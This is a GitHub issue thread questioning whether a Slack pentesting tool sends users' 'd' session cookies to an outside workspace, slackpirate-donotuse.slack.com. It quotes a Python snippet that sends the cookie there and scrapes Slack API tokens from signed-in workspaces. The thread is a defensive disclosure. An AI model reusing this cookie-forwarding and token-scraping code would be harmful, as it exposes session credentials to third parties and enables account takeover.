Cookie Harvesting on https://slackpirate-donotuse.slack.com ??

[jsmith449]

When you use the --cookie option it sends the d cookie to https://slackpirate-donotuse.slack.com

It is not clear from the readme that this will happen and what / if anything is in that slack workspace is captures all the d cookies submitted.

• Consider updating the readme to make it clear how the d cookie is used when the --cookie option is specified
• Is there a way to add transparency to the contents of the slackpirate-donotuse workspace ?

[apiwoni]

Just look at this code snippet:

 r = requests.get("https://slackpirate-donotuse.slack.com", cookies=cookie)
        already_signed_in_match = set(re.findall(ALREADY_SIGNED_IN_TEAM_REGEX, str(r.content)))
        if already_signed_in_match:
            for workspace in already_signed_in_match:
                r = requests.get("https://" + workspace + "/customize/emoji", cookies=cookie)
                regex_tokens = re.findall(SLACK_API_TOKEN_REGEX, str(r.content))

Doesn't it look suspicious to anyone that call to https://slackpirate-donotuse.slack.com get workspace could be replaced by additional argument where user passes workspace? There should be no need to pass your cookie to strangers!

It seems like this guy specializes in security so perhaps he was testing how many suckers would run unverified Python script!